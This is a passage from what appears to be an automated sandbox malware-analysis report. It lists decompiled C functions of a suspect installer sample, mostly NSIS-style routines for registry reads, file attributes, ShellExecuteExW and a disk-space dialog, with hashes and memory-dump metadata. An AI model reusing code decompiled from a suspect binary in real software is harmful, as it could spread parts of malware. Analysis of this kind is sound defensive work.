                                                                                        • Associated: 00000002.00000002.213854145780.000000006FE04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854195381.000000006FE06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_6fe00000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 144c83a54972d703677f5f1e45a0f99ba1db3f82d56a40664d62d40e061eab55
                                                                                        • Instruction ID: 26a53b2be978aa8f2d34c7912e7b867bdd5b5e849c0e3ed709ae4ae13090ec9f
                                                                                        • Opcode Fuzzy Hash: 144c83a54972d703677f5f1e45a0f99ba1db3f82d56a40664d62d40e061eab55
                                                                                        • Instruction Fuzzy Hash: 8DF0AEB0905B81DEDB50DF2C844470E3FE2BB1B325B24852EE188D6240E3364874DF99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004023F4(short __ebx) {
                                                                                        				short _t7;
                                                                                        				WCHAR* _t8;
                                                                                        				WCHAR* _t17;
                                                                                        				void* _t21;
                                                                                        				void* _t24;
                                                                                        
                                                                                        				_t7 =  *0x40a010; // 0xa
                                                                                        				 *(_t21 + 8) = _t7;
                                                                                        				_t8 = E00402DA6(1);
                                                                                        				 *(_t21 - 0x10) = E00402DA6(0x12);
                                                                                        				GetPrivateProfileStringW(_t8,  *(_t21 - 0x10), _t21 + 8, _t17, 0x3ff, E00402DA6(0xffffffdd)); // executed
                                                                                        				_t24 =  *_t17 - 0xa;
                                                                                        				if(_t24 == 0) {
                                                                                        					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                        					 *_t17 = __ebx;
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                                                        				return 0;
                                                                                        			}








                                                                                        0x004023f4
                                                                                        0x004023fb
                                                                                        0x004023fe
                                                                                        0x0040240e
                                                                                        0x00402425
                                                                                        0x0040242b
                                                                                        0x00401751
                                                                                        0x004028fc
                                                                                        0x00402903
                                                                                        0x00402903
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402425
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileString
                                                                                        • String ID:
                                                                                        • API String ID: 1096422788-0
                                                                                        • Opcode ID: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
                                                                                        • Instruction ID: 209997e2e20356d43fdb77e3237b303e11e03b8f2c16ee2f2baf27e4b220ec87
                                                                                        • Opcode Fuzzy Hash: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
                                                                                        • Instruction Fuzzy Hash: 05E01A30C00229FADB10AFA0CD09EAD3668BF41340F14052AF510AA0D1E7F889409789
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                        				void* _t7;
                                                                                        				long _t8;
                                                                                        				void* _t9;
                                                                                        
                                                                                        				_t7 = E00406329(_a4,  &_a12);
                                                                                        				if(_t7 != 0) {
                                                                                        					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                                        					return _t8;
                                                                                        				}
                                                                                        				_t9 = 6;
                                                                                        				return _t9;
                                                                                        			}






                                                                                        0x004063b4
                                                                                        0x004063bb
                                                                                        0x004063ce
                                                                                        0x00000000
                                                                                        0x004063ce
                                                                                        0x004063bf
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Open
                                                                                        • String ID:
                                                                                        • API String ID: 71445658-0
                                                                                        • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                        • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                                                        • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                        • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004015A3() {
                                                                                        				int _t5;
                                                                                        				void* _t11;
                                                                                        				int _t14;
                                                                                        
                                                                                        				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                                                        				_t14 = _t5;
                                                                                        				if(_t14 == 0) {
                                                                                        					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                                        				}
                                                                                        				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
                                                                                        				return 0;
                                                                                        			}






                                                                                        0x004015ae
                                                                                        0x004015b4
                                                                                        0x004015b6
                                                                                        0x0040292e
                                                                                        0x0040292e
                                                                                        0x00402c2d
                                                                                        0x00402c39

                                                                                        APIs
                                                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 33e977613f43845a6e57c4863c60741a5f6cc7a9a237a98d0a4dda90b58cd89e
                                                                                        • Instruction ID: 33d43a8ddb5fee1851102b8e64c9f064c627007e01bf6cdc746e786b0f5045d9
                                                                                        • Opcode Fuzzy Hash: 33e977613f43845a6e57c4863c60741a5f6cc7a9a237a98d0a4dda90b58cd89e
                                                                                        • Instruction Fuzzy Hash: 30D01772B08110DBDB11DBA8AA48B9D72A4AB50368B208537D111F61D0E6B8C945AA19
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004044E5(int _a4) {
                                                                                        				struct HWND__* _t2;
                                                                                        				long _t3;
                                                                                        
                                                                                        				_t2 =  *0x433ed8; // 0x10432
                                                                                        				if(_t2 != 0) {
                                                                                        					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                                        					return _t3;
                                                                                        				}
                                                                                        				return _t2;
                                                                                        			}





                                                                                        0x004044e5
                                                                                        0x004044ec
                                                                                        0x004044f7
                                                                                        0x00000000
                                                                                        0x004044f7
                                                                                        0x004044fd

                                                                                        APIs
                                                                                        • SendMessageW.USER32(00010432,00000000,00000000,00000000), ref: 004044F7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                        • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                                                        • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                                                        • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00405B63(struct _SHELLEXECUTEINFOW* _a4) {
                                                                                        				struct _SHELLEXECUTEINFOW* _t4;
                                                                                        				int _t5;
                                                                                        
                                                                                        				_t4 = _a4;
                                                                                        				_t4->lpIDList = _t4->lpIDList & 0x00000000;
                                                                                        				_t4->cbSize = 0x3c; // executed
                                                                                        				_t5 = ShellExecuteExW(_t4); // executed
                                                                                        				return _t5;
                                                                                        			}





                                                                                        0x00405b63
                                                                                        0x00405b68
                                                                                        0x00405b6c
                                                                                        0x00405b72
                                                                                        0x00405b78

                                                                                        APIs
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00405B72
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExecuteShell
                                                                                        • String ID:
                                                                                        • API String ID: 587946157-0
                                                                                        • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                        • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                                                                        • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                        • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004044CE(int _a4) {
                                                                                        				long _t2;
                                                                                        
                                                                                        				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                                                                        				return _t2;
                                                                                        			}




                                                                                        0x004044dc
                                                                                        0x004044e2

                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                        • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                                                        • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                                                        • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004034E5(long _a4) {
                                                                                        				long _t2;
                                                                                        
                                                                                        				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                        				return _t2;
                                                                                        			}




                                                                                        0x004034f3
                                                                                        0x004034f9

                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004044BB(int _a4) {
                                                                                        				int _t2;
                                                                                        
                                                                                        				_t2 = EnableWindow( *0x42d264, _a4); // executed
                                                                                        				return _t2;
                                                                                        			}




                                                                                        0x004044c5
                                                                                        0x004044cb

                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213831217448.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213831172599.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831300259.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831603731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831646932.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831743635.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831811550.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213831889195.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                        • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                                                        • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                                                        • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E6FE012BB() {
                                                                                        				void* _t3;
                                                                                        
                                                                                        				_t3 = GlobalAlloc(0x40,  *0x6fe0506c +  *0x6fe0506c); // executed
                                                                                        				return _t3;
                                                                                        			}




                                                                                        0x6fe012c5
                                                                                        0x6fe012cb

                                                                                        APIs
                                                                                        • GlobalAlloc.KERNELBASE(00000040,?,6FE012DB,?,6FE0137F,00000019,6FE011CA,-000000A0), ref: 6FE012C5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.213854083572.000000006FE01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FE00000, based on PE: true
                                                                                        • Associated: 00000002.00000002.213854032953.000000006FE00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854145780.000000006FE04000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.213854195381.000000006FE06000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_6fe00000_SecuriteInfo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocGlobal
                                                                                        • String ID:
                                                                                        • API String ID: 3761449716-0
                                                                                        • Opcode ID: cd1b5e6aff93e0256dc60f527bbe0353d7487e2c6b5e8071fb6aed718bc867d1
                                                                                        • Instruction ID: f0491a259cb73f5af9d08e6369584b46e4f9246d1f9c3510c7ea75b8bd4c785f
                                                                                        • Opcode Fuzzy Hash: cd1b5e6aff93e0256dc60f527bbe0353d7487e2c6b5e8071fb6aed718bc867d1
                                                                                        • Instruction Fuzzy Hash: DEB01270A00500DFFE008B68CE06F3C3A55F713311F044005F600D0180C1214C30853D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 78%
                                                                                        			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				long _v16;
                                                                                        				long _v20;
                                                                                        				long _v24;
                                                                                        				char _v28;
                                                                                        				intOrPtr _v32;
                                                                                        				long _v36;
                                                                                        				char _v40;
                                                                                        				unsigned int _v44;
                                                                                        				signed int _v48;
                                                                                        				WCHAR* _v56;
                                                                                        				intOrPtr _v60;
                                                                                        				intOrPtr _v64;
                                                                                        				intOrPtr _v68;
                                                                                        				WCHAR* _v72;
                                                                                        				void _v76;
                                                                                        				struct HWND__* _v80;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				intOrPtr _t82;
                                                                                        				long _t87;
                                                                                        				short* _t89;
                                                                                        				void* _t95;
                                                                                        				signed int _t96;
                                                                                        				int _t109;
                                                                                        				signed short _t114;
                                                                                        				signed int _t118;
                                                                                        				struct HWND__** _t122;
                                                                                        				intOrPtr* _t138;
                                                                                        				WCHAR* _t146;
                                                                                        				intOrPtr _t147;
                                                                                        				unsigned int _t150;
                                                                                        				signed int _t152;
                                                                                        				unsigned int _t156;
                                                                                        				signed int _t158;
                                                                                        				signed int* _t159;
                                                                                        				signed int* _t160;
                                                                                        				struct HWND__* _t166;
                                                                                        				struct HWND__* _t167;
                                                                                        				int _t169;
                                                                                        				unsigned int _t197;
                                                                                        
                                                                                        				_t156 = __edx;
                                                                                        				_t82 =  *0x42c240; // 0x51cefc
                                                                                        				_v32 = _t82;
                                                                                        				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
                                                                                        				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                        				if(_a8 == 0x40b) {
                                                                                        					E00405B81(0x3fb, _t146);
                                                                                        					E004067C4(_t146);
                                                                                        				}
                                                                                        				_t167 = _a4;
                                                                                        				if(_a8 != 0x110) {
                                                                                        					L8:
                                                                                        					if(_a8 != 0x111) {
                                                                                        						L20:
                                                                                        						if(_a8 == 0x40f) {
                                                                                        							L22:
                                                                                        							_v8 = _v8 & 0x00000000;
                                                                                        							_v12 = _v12 & 0x00000000;
                                                                                        							E00405B81(0x3fb, _t146);
                                                                                        							if(E00405F14(_t186, _t146) == 0) {
                                                                                        								_v8 = 1;
                                                                                        							}
                                                                                        							E0040653D(0x42b238, _t146);
                                                                                        							_t87 = E0040690A(1);
                                                                                        							_v16 = _t87;
                                                                                        							if(_t87 == 0) {
                                                                                        								L30:
                                                                                        								E0040653D(0x42b238, _t146);
                                                                                        								_t89 = E00405EB7(0x42b238);
                                                                                        								_t158 = 0;
                                                                                        								if(_t89 != 0) {
                                                                                        									 *_t89 = 0;
                                                                                        								}
                                                                                        								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                        									goto L35;
                                                                                        								} else {
                                                                                        									_t169 = 0x400;
                                                                                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                        									asm("cdq");
                                                                                        									_v48 = _t109;
                                                                                        									_v44 = _t156;
                                                                                        									_v12 = 1;
                                                                                        									goto L36;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t159 = 0;
                                                                                        								if(0 == 0x42b238) {
                                                                                        									goto L30;
                                                                                        								} else {
                                                                                        									goto L26;
                                                                                        								}
                                                                                        								while(1) {
                                                                                        									L26:
                                                                                        									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                                                        									if(_t114 != 0) {
                                                                                        										break;
                                                                                        									}
                                                                                        									if(_t159 != 0) {
                                                                                        										 *_t159 =  *_t159 & _t114;
                                                                                        									}
                                                                                        									_t160 = E00405E58(0x42b238);
                                                                                        									 *_t160 =  *_t160 & 0x00000000;
                                                                                        									_t159 = _t160;
                                                                                        									 *_t159 = 0x5c;
                                                                                        									if(_t159 != 0x42b238) {
                                                                                        										continue;
                                                                                        									} else {
                                                                                        										goto L30;
                                                                                        									}
                                                                                        								}
                                                                                        								_t150 = _v44;
                                                                                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                        								_v44 = _t150 >> 0xa;
                                                                                        								_v12 = 1;
                                                                                        								_t158 = 0;
                                                                                        								__eflags = 0;
                                                                                        								L35:
                                                                                        								_t169 = 0x400;
                                                                                        								L36:
                                                                                        								_t95 = E00404E27(5);
                                                                                        								if(_v12 != _t158) {
                                                                                        									_t197 = _v44;
                                                                                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                        										_v8 = 2;
                                                                                        									}
                                                                                        								}
                                                                                        								_t147 =  *0x433edc; // 0x51f5e2
                                                                                        								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                        									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                                                                        									if(_v12 == _t158) {
                                                                                        										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                                                        									} else {
                                                                                        										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                                                                        									}
                                                                                        								}
                                                                                        								_t96 = _v8;
                                                                                        								 *0x434fa4 = _t96;
                                                                                        								if(_t96 == _t158) {
                                                                                        									_v8 = E0040140B(7);
                                                                                        								}
                                                                                        								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                        									_v8 = _t158;
                                                                                        								}
                                                                                        								E004044BB(0 | _v8 == _t158);
                                                                                        								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                                                        									E004048E3();
                                                                                        								}
                                                                                        								 *0x42d258 = _t158;
                                                                                        								goto L53;
                                                                                        							}
                                                                                        						}
                                                                                        						_t186 = _a8 - 0x405;
                                                                                        						if(_a8 != 0x405) {
                                                                                        							goto L53;
                                                                                        						}
                                                                                        						goto L22;
                                                                                        					}
                                                                                        					_t118 = _a12 & 0x0000ffff;
                                                                                        					if(_t118 != 0x3fb) {
                                                                                        						L12:
                                                                                        						if(_t118 == 0x3e9) {
                                                                                        							_t152 = 7;
                                                                                        							memset( &_v76, 0, _t152 << 2);
                                                                                        							_v80 = _t167;
                                                                                        							_v72 = 0x42d268;
                                                                                        							_v60 = E00404CE0;
